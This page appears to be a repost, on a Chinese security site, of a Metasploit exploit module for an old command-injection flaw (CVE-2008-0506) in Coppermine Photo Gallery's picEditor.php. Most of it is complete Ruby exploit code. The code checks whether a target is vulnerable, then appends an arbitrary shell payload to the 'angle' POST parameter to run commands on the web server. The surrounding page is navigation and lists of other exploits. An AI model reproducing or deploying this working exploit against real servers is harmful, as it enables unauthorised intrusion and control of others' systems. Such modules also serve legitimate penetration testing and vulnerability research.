首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution(meta)
来源:http://www.metasploit.com 作者:waraxe 发布时间:2010-02-22  
##
# $Id: coppermine_piceditor.rb 8562 2010-02-19 07:31:12Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution',
			'Description'    => %q{
					This module exploits a vulnerability in the picEditor.php script of Coppermine
				Photo Gallery. When configured to use the ImageMagick library, the 'quality', 'angle',
				and 'clipval' parameters are not properly escaped before being passed to the PHP
				'exec' command.

				In order to reach the vulnerable 'exec' call, the input must pass several validation
				steps.

				The vulnerabilities actually reside in the following functions:

				image_processor.php: rotate_image(...)
				include/imageObjectIM.class.php: imageObject::cropImage(...)
				include/imageObjectIM.class.php: imageObject::rotateImage(...)
				include/imageObjectIM.class.php: imageObject::resizeImage(...)
				include/picmgmt.inc.php: resize_image(...)

				NOTE: Use of the ImageMagick library is a non-default option. However, a user can
				specify its use at installation time.
			},
			'Author'         =>
				[
					'Janek Vind', # original discovery/exploit
					'jduck'       # metasploit version
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8562 
, 'References' => [ [ 'CVE', '2008-0506' ], [ 'OSVDB', '41676' ], [ 'URL', 'http://www.exploit-db.com/exploits/5019' ], [ 'URL', 'http://forum.coppermine-gallery.net/index.php?topic=50103.0' ] ], 'Privileged' => true, # web server context 'Payload' => { 'DisableNops' => true, 'BadChars' => '\'', # input gets passed to htmlentities 'Space' => 1024, }, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Jan 30 2008', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [ true, "Coppermine directory path", "/cpg1414" ]), ], self.class) end def check res = send_request_raw({ 'uri' => datastore['URI'] + '/picEditor.php' }, 25) if (res and res.body =~ /Coppermine Picture Editor/i) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit valid_imgs = %w{thumb_audio.jpg thumb_avi.jpg thumb_doc.jpg thumb_document.jpg thumb_gz.jpg thumb_htm.jpg thumb_html.jpg thumb_mid.jpg thumb_midi.jpg thumb_mov.jpg thumb_movie.jpg thumb_mp3.jpg thumb_mpeg.jpg thumb_mpg.jpg thumb_nopic.jpg thumb_ogg.jpg thumb_pdf.jpg thumb_private.jpg thumb_qtv.jpg thumb_ra.jpg thumb_ram.jpg thumb_rar.jpg thumb_rm.jpg thumb_rmj.jpg thumb_swf.jpg thumb_txt.jpg thumb_wav.jpg thumb_wma.jpg thumb_wmv.jpg thumb_xls.jpg thumb_zip.jpg} img = '../../images/' + valid_imgs[rand(valid_imgs.length)] # suppress errors from convert angle = rand_text_numeric(1+rand(8)) + ' -quiet 1 2' # and exec our cmd :) angle += ';' + payload.encoded + ';#' res = send_request_cgi({ 'method' => 'POST', 'uri' => datastore['URI'] + "/picEditor.php", 'vars_post' => { 'angle' => angle, 'quality' => '50', # not required, but fixes an error message 'newimage' => img } }, 25) if (res and res.code == 200) print_status("Successfully POST'd exploit data") else raise RuntimeError, "Error POSTing exploit data" end handler end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy~Ftp Server v1.7.0.2 (HTTP
·FileApp v1.7 for iPhone/iPod R
·gitWeb v1.5.2 Remote Command E
·Rising Online Virus Scanner v2
·Adobe Products XML External En
·iTunes 9.0.1 .pls file handlin
·Symantec Antivirus 10.0 Active
·OtsTurntables Free v1.00.047 (
·iFTPStorage v1.2 for Iphone\Ip
·Apple Iphone/Ipod - FTP On The
·cPanel Multiple CSRF Vulnerabi
·Easy~Ftp Server v1.7.0.2 Post-
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved